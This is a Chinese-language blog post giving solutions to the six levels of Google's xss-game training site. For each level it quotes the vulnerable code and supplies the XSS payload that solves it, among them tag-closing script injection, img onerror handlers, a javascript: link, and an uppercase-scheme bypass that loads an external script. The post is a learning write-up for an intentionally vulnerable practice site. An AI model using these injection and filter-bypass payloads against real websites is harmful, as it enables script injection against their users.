<!DOCTYPE html>
<html lang="zh_cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"rock718.github.io.git","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0.前言在花了一个下午和晚上之后,终于做完了这六道题目,感觉还是挺有收获的.整体感觉这六道题目比较简单,难度不高. 这是站点 : https:&#x2F;&#x2F;xss-game.appspot.com&#x2F; 1.闲言少叙,书归正转.Level 1: Hello, world of XSS入手点：    level.py的第44行代码   # Our search engine broke, we found no">
<meta property="og:type" content="article">
<meta property="og:title" content="google xss-game 题目解答">
<meta property="og:url" content="https://rock718.github.io.git/2017/08/14/xss-game-writeup/index.html">
<meta property="og:site_name" content="Rock&#39;s blog">
<meta property="og:description" content="0.前言在花了一个下午和晚上之后,终于做完了这六道题目,感觉还是挺有收获的.整体感觉这六道题目比较简单,难度不高. 这是站点 : https:&#x2F;&#x2F;xss-game.appspot.com&#x2F; 1.闲言少叙,书归正转.Level 1: Hello, world of XSS入手点：    level.py的第44行代码   # Our search engine broke, we found no">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://rock718.github.io.git/images/2017/08/level4.jpg">
<meta property="og:image" content="https://rock718.github.io.git/images/2017/08/level5.jpg">
<meta property="og:image" content="https://rock718.github.io.git/images/2017/08/level6(1).jpg">
<meta property="og:image" content="https://rock718.github.io.git/images/2017/08/level6(2).jpg">
<meta property="article:published_time" content="2017-08-14T03:21:09.000Z">
<meta property="article:modified_time" content="2017-09-27T12:26:55.000Z">
<meta property="article:author" content="Rock">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rock718.github.io.git/images/2017/08/level4.jpg">

<link rel="canonical" href="https://rock718.github.io.git/2017/08/14/xss-game-writeup/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh_cn'
  };
</script>

  <title>google xss-game 题目解答 | Rock's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Rock's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">兴趣是最好的老师</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh_cn">
    <link itemprop="mainEntityOfPage" href="https://rock718.github.io.git/2017/08/14/xss-game-writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Rock">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Rock's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          google xss-game 题目解答
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2017-08-14 11:21:09" itemprop="dateCreated datePublished" datetime="2017-08-14T11:21:09+08:00">2017-08-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2017-09-27 20:26:55" itemprop="dateModified" datetime="2017-09-27T20:26:55+08:00">2017-09-27</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="0-前言"><a href="#0-前言" class="headerlink" title="0.前言"></a>0.前言</h2><p>在花了一个下午和晚上之后,终于做完了这六道题目,感觉还是挺有收获的.整体感觉这六道题目比较简单,难度不高.</p>
<p>这是站点 : <a target="_blank" rel="noopener" href="https://xss-game.appspot.com/">https://xss-game.appspot.com/</a></p>
<h2 id="1-闲言少叙-书归正转"><a href="#1-闲言少叙-书归正转" class="headerlink" title="1.闲言少叙,书归正转."></a>1.闲言少叙,书归正转.</h2><h3 id="Level-1-Hello-world-of-XSS"><a href="#Level-1-Hello-world-of-XSS" class="headerlink" title="Level 1: Hello, world of XSS"></a>Level 1: Hello, world of XSS</h3><p>入手点：<br>    level.py的第44行代码</p>
<pre><code>  # Our search engine broke, we found no results :-(
      message = &quot;Sorry, no results were found for &lt;b&gt;&quot; + query + &quot;&lt;/b&gt;.&quot;
      message += &quot; &lt;a href=&#39;?&#39;&gt;Try again&lt;/a&gt;.&quot;
</code></pre>
<p>思路：<br>    直接闭合 &lt;b&gt; 标签,插入js代码</p>
<p>答案：</p>
<pre><code>&lt;/b&gt;&lt;script&gt;alert()&lt;/script&gt;&lt;b&gt;
</code></pre>
<h3 id="Level-2-Persistence-is-key"><a href="#Level-2-Persistence-is-key" class="headerlink" title="Level 2: Persistence is key"></a>Level 2: Persistence is key</h3><p>入手点：<br>    index.html的第30行代码</p>
<pre><code>html += &quot;&lt;blockquote&gt;&quot; + posts[i].message + &quot;&lt;/blockquote&quot;;
</code></pre>
<p>思路：<br>    这道题我一开始想用上道题的套路，但显然不可以。具体为什么我还不是很明白。根据题目的提示，貌似可以利用 &lt;img&gt; 标签的onerror属性。</p>
<p>答案：</p>
<pre><code>&lt;img src=&quot;***&quot; onerror=&quot;alert()&quot;&gt;
</code></pre>
<h3 id="Level-3-That-sinking-feeling…"><a href="#Level-3-That-sinking-feeling…" class="headerlink" title="Level 3: That sinking feeling…"></a>Level 3: That sinking feeling…</h3><p>入手点：<br>    index.html的第17行代码</p>
<pre><code>html += &quot;&lt;img src=&#39;/static/level3/cloud&quot; + num + &quot;.jpg&#39; /&gt;&quot;;
</code></pre>
<p>思路：<br>    这道题乍一看没有让用户输入的地方。通过查看代码第43行，我们知道页面会调用chooseTab函数，将url中#后面的字符串做为参数传入。我们需要构造一个字符串，使img标签加载的时候执行我们的代码。</p>
<p>答案：</p>
<pre><code>&#39;onerror=&quot;alert()&quot;/&gt;
</code></pre>
<h3 id="Level-4-Context-matters"><a href="#Level-4-Context-matters" class="headerlink" title="Level 4: Context matters"></a>Level 4: Context matters</h3><p>入手点：<br>    timer.html的第21行代码</p>
<pre><code>&lt;img src=&quot;/static/loading.gif&quot; onload=&quot;startTimer(&#39;&#123;&#123; timer &#125;&#125;&#39;);&quot; /&gt;
</code></pre>
<p>思路：<br>    这道题通过构造特殊的timer变量值，使得<img>标签中的js代码得以执行。</p>
<p>答案：</p>
<pre><code>&#39;),alert()//
</code></pre>
<p>在做题目的时候发现自己的输入被转义成了html实体，以为无法被指执行，所以想破头也没想出来。在看了答案后才知道是能够被执行的。不过我还是不知道这是为什么？</p>
<img src="../../../../images/2017/08/level4.jpg">

<h3 id="Level-5-Breaking-protocol"><a href="#Level-5-Breaking-protocol" class="headerlink" title="Level 5: Breaking protocol"></a>Level 5: Breaking protocol</h3><p>入手点：<br>    signup.html的第15行代码</p>
<pre><code>&lt;a href=&quot;&#123;&#123; next &#125;&#125;&quot;&gt;Next &gt;&gt;&lt;/a&gt;
</code></pre>
<p>思路：<br>    通过查看代码，三个html都是很简单的页面，只有signup.html调用了next变量，并放到了 &lt;a&gt; 标签中，我不禁想到利用其执行js代码。再通过读level.py我了解到当页面的url参数带有”signup”时，next的值为next变量获得的参数值。那么这道题目就很简单了，我们只需要利用 &lt;a&gt; 标签的url来执行代码。</p>
<p>答案：</p>
<pre><code>javascript:alert()
</code></pre>
<img src="../../../../images/2017/08/level5.jpg">

<h3 id="Level-6-Follow-the-rabbit"><a href="#Level-6-Follow-the-rabbit" class="headerlink" title="Level 6: Follow the rabbit"></a>Level 6: Follow the rabbit</h3><p>入手点：<br>    index.html的第17~25行代码。</p>
<pre><code>var scriptEl = document.createElement(&#39;script&#39;);

  // This will totally prevent us from loading evil URLs!
  if (url.match(/^https?:\/\//)) &#123;
    setInnerText(document.getElementById(&quot;log&quot;),
      &quot;Sorry, cannot load a URL containing \&quot;http\&quot;.&quot;);
    return;
  &#125;
</code></pre>
<p>思路：<br>    题目说得很清楚，利用外部js脚本执行alert()。但最大的问题是对我们给出的url做了过滤。这让我很头疼，心想难道 &lt;script&gt; 标签难道还有其他的属性可以利用？后来才了解到到题目只对小写的http和https过滤了，而url的协议与地址部分是不区分大小写的，也就是说我写成hTtPs:&#x2F;&#x2F;也是没问题的！</p>
<p>答案：</p>
<pre><code>HTTPS://www.rockblog.cn/test.js
</code></pre>
<img src="../../../../images/2017/08/level6(1).jpg">

<p>让我惊喜的是还有一种在我看来更惊艳的答案，利用了data类型的url。</p>
<p>解决方案如下：</p>
<pre><code>data:text,alert()
</code></pre>
<img src="../../../../images/2017/08/level6(2).jpg">
    
<p>在下实在是佩服！</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/xss/" rel="tag"># xss</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2017/07/11/hexo_build/" rel="prev" title="利用腾讯云服务器搭建hexo博客">
      <i class="fa fa-chevron-left"></i> 利用腾讯云服务器搭建hexo博客
    </a></div>
      <div class="post-nav-item">
    <a href="/2017/09/03/kali-XX-Net/" rel="next" title="kali 安装 XX-Net openssl报错">
      kali 安装 XX-Net openssl报错 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0-%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">0.前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E9%97%B2%E8%A8%80%E5%B0%91%E5%8F%99-%E4%B9%A6%E5%BD%92%E6%AD%A3%E8%BD%AC"><span class="nav-number">2.</span> <span class="nav-text">1.闲言少叙,书归正转.</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-1-Hello-world-of-XSS"><span class="nav-number">2.1.</span> <span class="nav-text">Level 1: Hello, world of XSS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-2-Persistence-is-key"><span class="nav-number">2.2.</span> <span class="nav-text">Level 2: Persistence is key</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-3-That-sinking-feeling%E2%80%A6"><span class="nav-number">2.3.</span> <span class="nav-text">Level 3: That sinking feeling…</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-4-Context-matters"><span class="nav-number">2.4.</span> <span class="nav-text">Level 4: Context matters</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-5-Breaking-protocol"><span class="nav-number">2.5.</span> <span class="nav-text">Level 5: Breaking protocol</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Level-6-Follow-the-rabbit"><span class="nav-number">2.6.</span> <span class="nav-text">Level 6: Follow the rabbit</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Rock</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Rock</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
